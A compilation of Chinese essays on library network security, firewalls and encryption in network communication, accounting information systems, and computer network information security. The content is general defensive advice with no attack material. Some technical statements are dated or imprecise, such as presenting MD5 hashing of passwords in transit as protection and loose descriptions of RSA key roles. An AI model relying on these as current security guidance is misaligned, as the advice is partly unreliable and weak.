1 图书馆网络安全影响因素分析

1.1 计算机病毒

计算机病毒, 是在计算机程序中插入的破坏计算机功能或者破坏数据, 影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。计算机病毒具有繁殖性、传染性、潜伏性、隐蔽性、破坏性以及可触发性等特点, 曾出现过的CIH、熊猫烧香等病毒均对社会造成过巨大的经济损失[1]。计算机病毒是高校图书馆面临的一大威胁, 一旦感染或侵入, 病毒便可不断繁殖、扩散到到内部工作网上的各台计算机, 这将可能导致整个图书馆网络在短时间内陷入瘫痪, 致使所有网络服务无法开展, 甚至还会毁坏数据及网络设备, 给高校图书馆造成巨大的经济损失。

1.2 软件因素

图书馆网络系统的软件因素, 涉及到操作系统软件和图书馆管理自动化应用软件两个层面。操作系统方面, 目前高校图书馆主要使用的是Unix、Windows NT、Windows 2003Server等, 无论是哪一种系统, 都会不可避免地存在一些漏洞, 而这都容易遭受计算机病毒或其它人为因素的破坏[2]。在图书馆自动化管理应用软件方面, 目前各高校图书馆所采用的管理软件各不相同, 开发水平、软件成熟度上便各有不同, 因而在安全性能上存在差异。如果所选用的管理软件开发水平不够高、安全性能不足, 便会在安全方面存在各种各样的隐患。

1.3 网络环境因素

在高校图书馆的自动化网络化建设进程中, 网络设备所处环境必须作为一个不可忽视的环节。网络设备通常对其所处的物理环境都有较高的要求, 部分高校图书馆在网络化建设中或多或少地存在着重视网络硬件设备而忽略网络外部环境建设的问题。网络设备除防水、防火、防震等常规要求外, 对所处环境的温度、湿度、空气质量、静电和电磁干扰等物理条件也有严格要求, 忽略这些环境因素, 都将对图书馆后续的网络信息安全留下隐患。

1.4 管理制度因素

在高校图书馆的自动化网络建设进程中, 在解决计算机网络安全问题时, 非技术性措施如管理因素在整个计算机网络管理中也是至关重要的。管理因素主要包括了相关制度的健全性、分工的明确性、相关监督措施的力度等方面, 图书馆网络平台的正常运转, 必须以完善的管理制度作为前提与保障。有的高校图书馆正是因为没有健全严格的管理制度, 导致馆内计算机网络时断时续, 严重影响图书馆各项服务的正常开展, 因此, 仅有符合要求的网络硬件环境, 如果管理水平低下, 管理缺乏力度, 图书馆的网络信息安全也得不到保障。

2 图书馆网络安全问题应对策略

2.1 严防网络病毒

我们对计算机病毒并不陌生, 计算机病毒在网络中泛滥已久, 计算机病毒一旦感染, 通常会在局域网中快速繁殖, 致使局域网内计算机间的相互感染[3]。应考虑将业务工作局域网与校园网隔离开来, 在其接口处架设硬件防火墙, 来保证内外网间通信的安全性;对任何文件的使用, 必须先利用最新反病毒软件检测, 一旦发现病毒及时查杀;对所安装的反病毒软件应及时更新, 对系统应进行定时全面检测, 以及时发现并清除病毒;高校图书馆的馆藏数据有其特殊的动态性, 它直接反映了本馆馆藏文献资源的流动状况, 因此, 对馆藏数据应做好定期备份, 以避免其遭受网络病毒的入侵。

2.2 建立规范化网络技术体系

高校图书馆业务工作网络安全, 是图书馆业务系统和数据信息得以保存并可靠运行的支撑, 为了保证其安全稳定地运行, 防止非法人员访问、防止数据泄漏和丢失和防止非法数据进入, 就必须建立一套规范化的网络技术保障体系。必须为系统设置开机口令、软件口令以及特殊操作口令等一系列口令体系, 且在使用过程中要定期更换;对于重要服务器须采用单独网段进行隔离、身份鉴别、备份及恢复等应急措施进行有效防护;对图书馆日常数据的备份工作必须严格执行, 对于服务器可通过磁盘备份工具实现双机热备, 此外还应定期对数据进行机外备份, 将数据异地存放, 为整个网络系统数据的安全性提供保证。

2.3 做好网络环境建设

网络设备通常对其所处的物理环境都有较高的要求, 部分高校图书馆在网络化建设中或多或少地存在着重视网络硬件设备而忽略网络外部环境建设的问题。在良好的网络环境下, 网络设备的使用寿命可以更长, 且网络的安全稳定性能也可大大提高[4]。在网络机房位置的选择上, 应避开污染源和强电场等不良环境, 机房的内部装修应要具有较高的防火、防水、防尘、抗静电、防雷击及抗磁场干扰等功能;在机房的内部配置上, 应具备自动火灾报警消防系统、干粉灭火器、空调设备, 电源应选专线, 且应该有良好的接地线和漏电保护装置等。

2.4 健全网络安全管理制度

高校图书馆在文献信息资源及网络体系建设方面, 投入了大量的人力、物力和财力, 但如果缺少一个完善的网络安全管理制度, 任何先进网络产品都无法有效发挥作用。因此, 高校图书馆应逐步完善业务工作网络安全管理制度, 包括机房管理、软硬件维护管理、网络安全管理、系统安全管理、电子阅览室管理、备份和恢复管理、安全事件报告和处置方面的管理、应急响应方法、应急响应计划等制度, 并建立完善的跟踪体系, 做到职责明确, 责任到人, 在实现网络信息资源共建、共知、共享的基础上, 保障数字资源及信息系统业务的可持续性。

3 结语

高校图书馆网络信息安全是一项综合因素众多、技术含量很高的复杂工程。保护高校图书馆的网络信息安全是图书馆员义不容辞的责任, 当然, 要彻底消除各种安全问题是不可能的, 只能通过各种方式来加以防范, 图书馆网络安全依赖于相关信息技术的进步, 同时也依赖于管理制度的不断完善以及人员素质的全面提升。S

摘要:高校图书馆是高等学校的文献信息中心, 目前图书馆网络信息安全问题越来越受到人们的重视。对目前威胁高校图书馆网络信息安全的因素作了较为全面的分析, 并结合自身实践针对性地提出了相应的应对策略。

关键词:高校图书馆,信息资源,网络安全

参考文献

[1]赵晓红, 雒伟群, 刘伟光.高校图书馆网络安全分析与防护策略[J].计算机与信息技术, 2009 (3) .

[2]李太芳.高校图书馆网络安全防范技术探析[J].产业与科技论坛, 2009 (8) .

[3]王应, 刘子辉.当前高校图书馆网络安全问题分析与对策[J].重庆科技学院学报:社会科学版, 2011 (17) :151.

网络通讯中信息安全性探索 篇8

1 网络通讯中的信息安全技术简介

根据传统的计算机网络理论,网络通讯分为编码、发送、传输、接受和解码这几个过程,在这几个过程中都有可能会发生计算机安全的事故,所以网络通讯中的信息安全技术也应该从网络通讯的具体步骤出发,全面且有效地防止网络通讯中可能会出现的各种安全问题。一般来说,可以从网络通讯的几个部分出发,探讨信息安全的相关技术。

网络信息的存储和编码是网络通讯的起始环节,在这一环节中重要的技术是网络防火墙技术和信息加密技术,在经过信息加密之后,加密过的信息才能通过公用网络向目标地点传输,在传输过程中就算信息被别人截取,没有相应的解码手段就没办法分析出信息所要表达的真正含义。但是在信息的接受和解码阶段必须要有相应的解码手段,否则信息的传递也就无从谈起,所以在网络信息的传输中,安全技术主要集中在防火墙技术和加密编码技术两个方面。

2 防火墙技术的相关探索

防火墙即在计算机上构建的网络安全屏障,传统意义上的防火墙需要软件和硬件的结合,用以在专用网和万维网之间搭建一道可靠的安全屏障,用来阻挡外部的入侵,防止外部用户未经授权的访问以及对信息的窃取。防火墙技术的工作原理是在局域网和广域网之间建立一个安全网关,主要由服务访问政策、验证工具、包过滤以及应用网关四个部分组成,每个传输数据和访问的请求都需要经过防火墙的验证才能自由出入。

随着技术的发展,软件形式的防火墙正在得到普及,Windows自带的Windows Defender也能满足大部分用户的需求,但是对于企业级和更高层级的用户来说,软件级别的防火墙安全性可能不够,这就需要向网络安全相关的企业机构进行防火墙定制的申请或者采用硬件级别的防火墙进行彻底的安全防护。

而且,在网络通讯的整个过程中,防火墙还能够发挥更大的作用。防火墙能够从整体上强化整个网络传输链路的安全策略,如对信息的传输采取口令和加密的措施,对安全问题进行集中性质的管理。同时,防火墙还可以通过自身的信息记录功能对相关的信息进行统计,通过这些进行数据传输的日志记录可以对当前网络的使用情况和安全情况进行大致的预估,从而对网络环境中的可疑行为进行预先程度上的判定,防火墙还可以对内部网络起到环境隔离的作用,从而保护数据传输和网络通讯过程中一些较为隐私的数据,一些在数据传输过程中必然会泄露相关信息的服务比如Finger服务和DNS服务等都可以通过防火墙的运作有效地防止某些关键信息的泄露。防火墙还能实现内部IP和外部IP的转换,目前很多路由器也可以做到这一点,但是防火墙在这方面更加安全。

3 网络信息加密技术的相关探索

网络信息加密技术是网络通讯动态安全的核心技术,一般的信息加密技术分为对称式加密技术和非对称式加密技术。加密技术的原理在于利用某种数学上的函数对信息的每一个字符都进行相应的变换,并且在数据传输完成后根据反向的数据加密函数进行数据的解码,也只有拥有这个解码工具的一方才能确实收到网络通讯的相关信息。

3.1 对称式加密技术在网络安全中的运用

对称加密是指在加密和解码的过程中采用同一套密钥进行相应的工作。经过特殊的算法处理后的明文通过网络进行传输,在接收方通过同一套相反的算法进行解码,所以接收方必须从一开始就知道相应的密钥,这样才能顺利地完成信息传递。这一过程中通常会使用数据加密的标准算法或数据加密的高级加密标准算法进行处理,标准算法比较常用,但是这种方法也存在着一定的弊端,首先是安全性在密钥泄露的前提下就会完全没有保障,其次密钥的复杂程度也已经不适应当前的网络环境安全需求了。这种情况下如果还想使用对称式加密技术的话,可以采取AES安全技术,即高级加密标准算法进行处理。

3.2 非对称加密技术在网络安全中的运用

非对称加密技术即加密和解码的双方持有不同的密钥,密钥分为私有密钥和公开密钥,具体来说私有密钥比公开密钥具有更高的权限,这种算法中最为应用广泛的是RSA算法,这种算法在当前的网络环境下有着超强的攻击抵御能力,由于RSA算法的特殊性,即使用数字签名和加密运算两种方式进行,这两种算法的同时运行相当于为网络安全提供了双重保障,所以在很多地方都能得到应用。

3.3 信息加密技术在网络通讯中的具体应用

信息加密技术在网络通讯中是要具体运用到一定的物理层级上的,如链路加密、节点加密于端口加密等。其中链路加密是指在信息传输的过程中进行加密,不考虑信息传输的发送端和接收端,链路加密在运行的过程中会建立临时的信息传输节点,在节点中通过接力的形式进行加密和解码的运算,但是链路加密的运算方式使得信息在节点中处于明文的状态。而节点加密是指在传输的节点中通过某种计算方式进行加密,所以在节点中也能避免以明文状态出现,如果和链路加密技术相结合,其安全性就会得到大大提升。在节点加密的过程中,信息在进入节点的时候是处于链路加密的状态的,因此节点要先使用一个密钥对其进行二次加密,在这个密钥的掩盖下进行相应的解码、加密和传输工作,链路加密中暴露在信息节点的明文信息就不会处于不安全的状态。

除了上述两种加密应用之外,从信息的发送端到接收端的信息加密也是非常重要的网络通讯安全技术。端到端的加密过程中整个传输都是通过密文来进行的,中间没有多余的加密和解码步骤,也就是说信息在被传达到终点之前是都处在密码保护的状态下的,而且相对于之前的加密应用,实行端到端的加密成本较低,而且安全性和维护方面都有一定的优势。但是端到端的加密方式不能在数据传输的过程中隐藏接收端与客户端的相关信息,因此在使用的时候也要注意或者和上述加密方式的应用结合在一起,形成一个较为完美的加密应用模式。

4 结语

网络通讯所占有的重要地位对信息安全性的发展有了更高的要求,所以在这一过程中我们要从硬件保护与软件保护的双重方向出发,以安装防火墙的方式对网络通讯的硬件安全进行支持,同时利用不同的加密方式完善加密的相关渠道,使得信息能够在公用网络中借助互联网进行更加方便快捷的传递。在这个信息安全大于一切的时代,网络通讯的安全要从企业或单位发展的实际出发,尽可能对它的私密性进行保全。

摘要:随着计算机网络技术的增强和计算机网络在人们生产和生活中的不断普及,计算机网络技术的安全性被越来越多地在各种重要的场合被提起,对于网络通讯技术中如何加强信息安全性的探索也在不断进行,在新的加密技术和网络安全技术的帮助下,网络通讯中的安全性也得到了强化,网络技术也在安全性的保障下得到了进一步革新。本文从网络通讯中的信息安全出发,探讨信息安全技术在网络时代下的发展创新方向。

关键词:信息安全,网络通讯,加密技术,信息技术

参考文献

[1]周昕.“云计算”时代的法律意义及网络信息安全法律对策研究[J].重庆邮电大学学报(社会科学版).2011.

[2]崔孝科.网络通讯中信息安全性的分析研究[J].计算机光盘软件与应用,20123

通讯网络信息 篇9

在会计漫长的历史发展进程中, 手工会计一直占据着主导地位, 随着计算机信息技术的快速发展, 全球信息化渗透到了社会生活的每一个角落, 网络信息技术在会计领域中也得到了广泛的应用。基于计算机技术的会计信息系统的出现, 打破了传统的会计模式, 改变了传统会计理论的框架, 为会计史掀开了崭新的一页。

会计信息系统 (Accountant Information System, AIS) 是基于电子计算机网络技术和现代信息技术, 以人为主导, 充分利用计算机硬件、软件、网络通信设备以及其他现代办公设备, 进行企事业单位会计业务数据的收集、存储、传输和加工, 用于处理会计核算业务, 提供财会信息, 并将其反馈给各有关部门, 为企业的经营活动和投资活动提供决策分析, 为投资者、债权人、政府部门提供财务信息的现代化信息管理系统。

会计信息系统的概念虽有多种说法, 但其达成共识的核心内容主要包括以下几个要点:①管理信息系统的一个子系统;②采用了现代化的计算机及通信技术;③运用软件工程学的开发方法;④处理会计核算业务;⑤能够进行财会分析、预测、决策和控制等管理。

2 会计信息系统的特点

会计信息系统并不是一个纯技术的系统, 其精髓是应用先进的现代管理思想和方法。与传统的会计系统操作相比, 基于网络信息技术的会计信息系统具有以下主要特点:

(1) 会计信息系统以计算机和互联网信息技术为主要工具, 采用人、机结合方式, 进行相互操作。

(2) 数据采集要求的标准化、规范化。会计信息系统要从原始单据中接收或获取会计数据, 输入的数据就必须标准化、规范化, 以适应计算机处理的要求。所以, 要改变以往会计凭证不统一的状况, 制定统一的标准和编码, 建立统一的数据输入格式, 并加强对输入数据的校验, 保证输入数据的正确性、合规性。

(3) 数据处理方式集中化和自动化。数据处理集中化是指在实现会计电算化以后, 原先各个业务岗位的核算工作都统一由计算机处理。特别是建立网络以后, 由于数据的传输和共享非常便利, 使数据得以方便、快速地进行集中处理。数据处理自动化是指在数据处理过程中, 人工干预明显减少, 程序设定后, 系统会对数据进行自动处理、分析、计算, 且计算结果较为精确。

(4) 会计信息载体无纸化。在会计信息系统中, 会计证、账、表信息的存储介质采用了人看不见、摸不着的光、电、磁介质。这种介质不同于纸介质, 人不能直接识读, 但可存放信息量大、查询速度快, 且易于复制和删除, 所以可以利用同一基础数据实现信息的多维重组, 满足不同信息使用者的需求。

(5) 财务和业务的协同处理。一方面是财务和企业内部业务的协同处理, 另一方面是财务和企业外部业务的协同处理。在企业经营链上, 如果每个业务活动伴随着的财务信息能及时得到会计信息系统的处理, 并将处理结果及时反馈给企业内外部, 就可以实现信息同步交流、共享和信息的远程处理, 实现企业与外部社会各部门的协同。

3 当前会计信息系统存在的问题

随着经济全球化、社会信息化, 企业获得和需要处理的信息越来越多、越来越复杂。传统的会计信息系统已难以满足企业经营管理和决策的要求。其缺陷主要表现在以下几个方面:

3.1 大多数企业的会计信息系统可以形容为企业内部的“信息孤岛”

“会计信息孤岛”是指会计信息系统收集、处理和储存的信息与其他业务信息系统无法交换和共享。会计信息不仅要为企业内部服务, 满足企业管理者预测、决策的需要, 而且还要综合反映企业信息, 为企业外部服务 (诸如为外部企业、银行、税务所服务等) , 以适应信息化社会的需要。在现代管理思想的影响下, 企业的生产、库存、销售等业务的过程不仅在内部相互关联, 而且还超越了企业自身范围, 扩展到了供需链、供需网。要求企业生产、采购、库存、销售等业务与会计信息系统紧密相连, 而传统财务软件系统并没有实现财务活动与业务活动系统的有效连接, 未能成为企业管理信息系统的有机组成部分, 是一个封闭式系统。同时, 传统会计信息系统与企业外部社会信息系统相互隔离, 不能充分实现信息共享与交换, 这都不适应信息时代发展的要求, 因此便形成了所谓的“会计信息孤岛”现象。

3.2 传统会计信息系统不能有效地反映非货币信息

传统会计信息系统采用的会计软件一般按照财政部《会计核算软件基本功能规范》的规定, 遵循公认的会计准则, 按会计循环有选择地处理有关的货币信息。它只采集和储存了有关业务活动数据的一部分:日期、账户和金额, 即满足会计事项定义的那些业务事件数据的一个子系统。而对于诸如企业生产力、执行情况、技术创新、关联方及关联方交易等非货币信息无能为力。随着当今市场经济的迅速发展, 企业处于一个日益复杂多变的市场环境里, 企业在决策中需要把非财务数据与财务数据综合起来考虑, 即需要多元化的决策支持系统。这使得管理人员的信息需求与会计信息系统提供的信息差距越来越大, 传统会计信息系统已很难满足当今管理人员的信息需求。

3.3 会计电算化系统数据执行主体和保存介质存在安全隐患

会计信息系统数据执行主体是计算机 (由硬件和软件构成) , 如果硬件系统出现故障或发生停电等其他非人为因素, 将导致数据丢失。如果软件系统出现问题将会影响到数据处理的速度和精确性。如果程序遇到恶意病毒侵害, 将给会计信息系统的安全构成极大的威胁。一般会计的数据主要保存在硬盘、光盘和U盘等磁介质中, 如果数据被人为恶意修改或破坏不会留下任何痕迹, 同时磁介质如遇受热、受潮、折损等情况容易出现损坏, 造成保存的会计数据丢失, 会给企业会计工作带来不可估量的威胁。

4 完善会计信息系统的对策及未来发展趋势

随着计算机互联网技术的快速发展, 信息得以高速流动, 资源得以海量集成并得到合理配置。Internet的出现引发了传统贸易的巨大变革, 而会计是企业经济活动的载体, 也必然需要转变传统模式以适应时代的进步。同时, 会计系统是社会生产力发展的产物, 它的发展标志着社会文明和经济管理的进步。

4.1 建立基于企业内部网 (Intranet) 、企业外部网 (Extranet) 、国际互联网 (Internet) 三个层次上的会计信息系统, 使会计信息系统处在一个开放的空间中

这样可使得企业内部各部门及企业外部通过网络技术主动从企业信息库中提取有关的会计信息数据, 不再处于被动等待企业公布会计报告的境地;企业可以给不同的会计信息用户以不同的访问权限, 可以有效防止企业商业秘密泄露;政府各部门特别是审计部门也可以主动获取会计信息, 并采用新的方法监督和跟踪会计处理过程, 可以使企业非法篡改会计信息行为得到一定程度的约束和限制, 有利于社会公众和政府对企业会计信息系统的监督。

4.2 加快网络财务会计的建设发展

网络财务是以财务管理为核心, 实现业务管理与财务管理一体化的财务信息系统。它是在传统会计信息系统及其他管理系统的基础上建立的能在局域网、广域网、互联网相互协同的开放网络中整合使用, 适应远程应用, 从电子商务角度对业务进行重组的会计信息管理系统。网络财务具有以下几个方面的优点:

(1) 可实现会计核算从事后转为实时, 将实时信息处理及时嵌入业务处理过程中。网络财务通过网络将各种业务数据信息及时传输到财务部门进行加工处理, 并将处理结果及时反馈给信息需求者。

(2) 财务管理由静态管理走向动态管理, 实现了实时监控、实时决策;实现了财务部门与相关业务部门的同步管理;实现了库存管理、销售管理、生产管理、工资人事管理等管理系统的集成共享。

(3) 财务管理由企业内部走向企业外部, 由局部管理到全面管理, 从而使企业内外部的全部财务资源得到有效整合, 提高了企业财务管理水平和经济效益。

4.3 发展会计决策支持系统

所谓会计决策支持系统是一个基于计算机技术的人机交互式系统, 利用会计数据信息和其他管理信息, 通过人机交互的方式帮助决策者解决结构化和非结构化的问题。在如今的信息经济时代, 企业面临竞争日益激烈的外部经济环境, 迫切要求管理者对大多数结构化、半结构化、非结构化的经营管理问题作出正确、快速的决策, 这些决策任务仅仅依靠手工是很难完成的, 而且会计信息系统承担着企业绝大部分的信息处理任务, 因而企业管理者迫切需要建立一个完善的决策支持系统为其决策提供支持。

随着计算机网络技术在企业管理和会计系统中的广泛运用, 其内容、目标、手段等与传统模式有巨大的转变, 会计财务环境更为复杂, 会计财务工具都与以往有了很大的不同, 所以要在传统财务会计观念基础上不断深化、发展, 充分利用网络信息技术开展会计创新工作, 建立与信息经济时代相适应的会计信息系统, 满足企业管理与发展的需要, 为企业带来更大的内在价值。

参考文献

[1]张佩卿.试谈网络会计的未来发展趋势[J].经济技术协作信息, 2004 (4) .

[2]江中雯.现代会计信息系统报告模式探讨[J].财会月刊, 2007 (2) .

[3]魏丽娟, 张晓峰.网络环境下会计信息系统的特征及其发展趋势[J].武汉理工大学学报, 2005 (6) .

计算机网络信息安全与信息管理 篇10

随着信息化进程的深入和互联网的快速发展, 人们越来越习惯把日益繁多的事情托付给计算机来完成。网络化已经成为单位企业信息化的发展大趋势, 信息资源也得到最大程度的共享。但是, 紧随信息化及互联网发展而来的网络安全问题日益突出, 已成为影响信息化进一步发展的重大问题。目前, 危害计算机信息安全的事件频繁发生, 对很多人造成了损失。如何保护数据不受破坏修改泄露, 维持各种业务系统连续可靠的运行, 已经成为全世界很多专家学者的研究课题。

2. 信息安全简介

信息安全是指信息网络的硬件、软件及其系统中的数据受到保护, 不受偶然的或者恶意的原因而遭到破坏、更改、泄露, 系统连续可靠正常地运行, 信息服务不中断。

在公司单位具体的事务中, 信息安全主要是指要保证业务系统能够稳定持续的运行, 以及各种业务数据的保密性、真实性、完整性和防止未授权拷贝。

3. 详细说明

3.1 信息安全的目标

真实性:对信息的来源进行判断, 能对伪造来源的信息予以鉴别。

保密性:保证机密信息不被窃听, 或窃听者不能了解信息的真实含义。

完整性:保证数据的一致性, 防止数据被非法用户篡改。

可用性:保证合法用户对信息和资源的使用不会被不正当地拒绝。

不可抵赖性:建立有效的责任机制, 防止用户否认其行为, 这一点在电子商务中是极其重要的。

可控制性:对信息的传播及内容具有控制能力。

可审查性:对出现的网络安全问题提供调查的依据和手段

3.2 信息安全主要措施

信息安全的威胁来自方方面面, 不可一一罗列。但这些威胁根据其性质常被归纳为信息泄露、破坏信息的完整性、拒绝服务、非法使用 (非授权访问) 、窃听、业务流分析、假冒、旁路控制、授权侵犯、抵赖、病毒以及法律法规等几个方面, 下面将结合工作实际简要讲述一下预防这些风险的技术手段:

3.2.1 保障机房的物理安全与电气安全。

服务器或计算机是系统运行和数据存储的物理基础, 而机房作为放置这些设备的场所, 保证其安全性是保障信息安全的重中之重。一旦机房环境设备出现故障, 就会影响到计算机系统的运行, 对数据传输、存储以及整个系统运行的可靠性构成威胁, 若没有及时处理, 就可能损坏硬件设备, 造成严重后果。在所有造成数据丢失的原因中, 硬件损害对于数据恢复来说难度是最大的, 恢复的结果也经常不很理想。所以, 保障机房安全是信息安全的基础, 应该做到以下两点:

(1) 机房环境宽大、安全, 应有防火灾、防地震、防雷击的措施, 并要针对防盗、碰撞等情况做好相应的准备。

(2) 保证机房的供电安全。随着设备的不断增加, 机房能耗问题日趋严重。由于电网供电质量不稳定, 有时会出现电源故障, 包括电压浪涌、电压过压、欠压、瞬时电流冲击和故障停电等各种情况, 而硬件故障往往由这些问题引起。良好的供电设计可以为机房安全提供保障, 并维持计算机系统持续稳定的运行。

3.2.2 计算机或服务器的管理

计算机及服务器是数据和系统的直接载体, 上面保存着业务系统和各种数据。要保障其安全性, 在管理上必须做到以下几点:

(1) 根据其安全需求安装对应的操作系统, 并应对系统进行定期维护, 保证它的稳定性。如服务器必须安装特定的服务器版操作系统。

(2) 在系统中安装杀毒软件以及防火墙, 可以有效避免黑客的攻击以及病毒木马的入侵。

(3) 提高计算机或服务器操作系统的安全策略等级, 避免未获得授权的人通过各种手段远程连接计算机获取数据。

3.2.3 保障计算机网络稳定安全地运行

网络安全是系统安全的核心。计算机网络作为信息的主要收集、存储、分配、传输和应用的载体, 其安全对信息安全起着至关重要甚至是决定性的作用。不稳定的网络会引成数据完整性破坏、拒绝服务等种种的问题, 让用户不能完整快速地获取数据;存在网络漏洞则常常会因为别人故意利用或误操作, 造成信息泄露、窃听等种种危害。保障计算机网络稳定安全, 应从以下几点出发:

(1) 保护网络关键设备, 制定严格的网络安全规章制度, 安装不间断电源 (UPS) , 避免网络意外中断。

(2) 在用户访问网络资源时对其权限进行严格的认证和控制。可以采取用户身份认证, 口令加密, 设置用户访问目录和文件的权限, 控制网络设备权限等种种手段。访问控制是系统安全防范和保护的主要核心策略, 它的主要任务是保护系统资源不被非法使用和访问。访问控制规定了主体对客体访问的限制, 并在身份识别的基础上, 根据身份对提出资源访问的请求加以控制。

(3) 使用网闸和防火墙等设备, 在不同网域之间设置屏障, 阻止对信息资源的非法访问, 也可以阻止重要信息从内部网络中非法输出。必要时还可以使用虚拟专用网 (VPN) 等技术, 在公共网络上创建安全的私有连接, 提高网络中通信的安全性。

(4) 采用信息过滤等手段来保护网络上信息传播安全, 防止和控制由非法、有害的信息进行传播所产生的后果, 避免信息失控。

3.2.4 在业务系统中采取良好的设计

许多业务是通过网上业务系统来进行的, 用户通过业务系统存储以及查看数据, 所以业务系统的设计也与系统中的数据安全息息相关。在业务系统的设计实现中应该主要注意以下方面, 以提高系统和数据的安全性:

(1) 数据传输的保密性。在业务系统中应该采取比较安全的数据传输方式。为了避免保密数据泄露, 在传输这类数据时可以通过一定的技术手段进行处理, 而不是明文传输, 从而避免保密信息泄露。比如密码传输时采用md5等散列函数进行处理, 可以有效避免密码泄露。

(2) 应为系统设计良好的权限管理功能。权限管理, 一般指根据系统设置的安全规则或者安全策略, 用户可以访问而且只能访问自己被授权的资源。“用户认证”让系统知道用户“能不能用”, 而“权限管理”则通知系统用户“能用什么”。良好的权限管理设计能够避免用户使用不被授权的功能和数据, 从而降低了信息泄露、非法使用、授权侵犯的风险。

3.2.5 数据加密技术

加密技术对于互联网上信息安全来说有着举足轻重的地位。在互联网上进行文件传输、电子邮件商务往来存在许多不安全因素, 而且这种不安全性是不可避免的, 由互联网存在的基础——TCP/IP协议所引起。为了尽量降低信息泄露的风险, 采用技术手段对数据进行加密是一种通用的做法。现在一般采用非对称加密对数据进行处理 (如RSA算法) , 该方法的特点是存在两个密钥, 公共密钥由于加密, 面向外部公开;私人密钥用于解密, 内部保存。只要私人密钥不泄露, 就可以极大地保证数据的安全性。所以在实际工作中传输保密数据, 应该先对数据进行加密, 这样就算数据被别人恶意获取, 在没有私人密钥的情况下, 数据也不能使用, 进而避免因为数据泄露而造成的损失。

3.2.6 管理人员泄密风险

造成数据泄露还存在一种非技术的原因。由于管理员的松懈或者其它种种原因, 造成数据外流。我们在实际工作中也应该通过一些手段尽量减少风险:

定期对管理人员进行培训, 提高他们的安全保密意识。制定严格的安全管理制度, 从规章制度上避免这种情况的发生。

3.2.7 数据恢复

上面所说种种措施都是用于预防风险, 而数据恢复技术主要用于减少损失。数据恢复是指通过技术手段, 将保存在各种介质上丢失的电子数据进行抢救和恢复的技术。一般造成数据损坏的原因有硬件故障和人为破坏两种。硬件故障是指由于硬件损坏造成数据全部或部分丢失, 如硬盘出现坏道等, 应注意在故障后尽快找专业公司进行修复, 不应勉强继续使用, 以免发生更大的损失。人为破坏是指由于误操作或者恶意操作, 对数据的完整性造成了破环, 甚至数据遭到删除。这种情况可以通过数据恢复软件对数据进行恢复, 但应注意在恢复之前尽量避免对数据所在硬盘进行写入操作, 以免删除数据在硬盘中的残余信息遭到破坏。

4. 结语

信息作为一种资源, 它的普遍性、共享性、增值性、可处理性和多效用性, 使其对于人类具有特别重要的意义。信息安全的实质就是要保护信息系统或信息网络中的信息资源免受各种类型的威胁、干扰和破坏。为了达到这一目标, 我们在日常工作中应该抱着严谨负责的态度, 并熟练掌握各种防范手段和技术, 这样才能最大限度地保障计算机及网络信息的安全。

参考文献

[1]鲁立, 龚涛.《计算机网络安全》, ISBN:9787111335054, 机械工业出版社, 2011年4月

[2]蔡立军, 《网络安全技术》, ISBN:9787810828758, 北方交通大学出版社, 2006年9月

[3]刘安定, 浅谈计算机网络安全与防范[J], 佳木斯教育学院学报, 2011年6月

上一篇:探索中解决问题下一篇:向量数量积的基本用法